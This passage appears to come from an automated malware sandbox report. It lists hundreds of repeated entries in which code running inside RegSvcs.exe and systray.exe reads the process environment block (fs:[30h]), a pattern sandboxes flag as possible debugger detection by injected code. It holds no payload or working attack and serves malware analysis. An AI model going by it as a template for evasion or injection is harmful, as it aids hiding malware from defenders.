            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01348F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01288794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B37F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0132FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A8E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01287E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01287E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01287E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01287E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01287E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01287E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0133AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0133AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01340EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01340EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01340EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0130FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A16E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012876E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01348ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A36CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0132FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FE6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FE6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FE6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05038D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0502E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05013D40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F7849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05022D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05022D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05022D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05022D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05022D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05022D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05022D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FFC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FFC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_050305AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_050305AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0502FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0502FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0502FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0502FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05018DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0503740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0503740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0503740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F7D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F7D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FE6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F91DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F91DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F91DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F935A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F92581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F92581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F92581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F92581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05024496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F87D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FE3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F94D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F94D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F94D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F6AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FEA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05038CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_050214FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0503070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0503070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F776E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F916E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F936CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FE46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05038F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FFFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F7766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F6E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F6C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F6C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F6C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F98E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05021608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA37F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0501FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0502AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0502AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F78794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FE7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FE7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FE7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F7FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05030EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05030EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05030EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F7EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0501FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8B73D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8B73D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05038ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F64F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F64F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FFFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FFFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F640E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F640E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F640E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F658EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8B8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8B8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FFB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FFB8D0 mov eax, dword ptr fs:[00000030h]
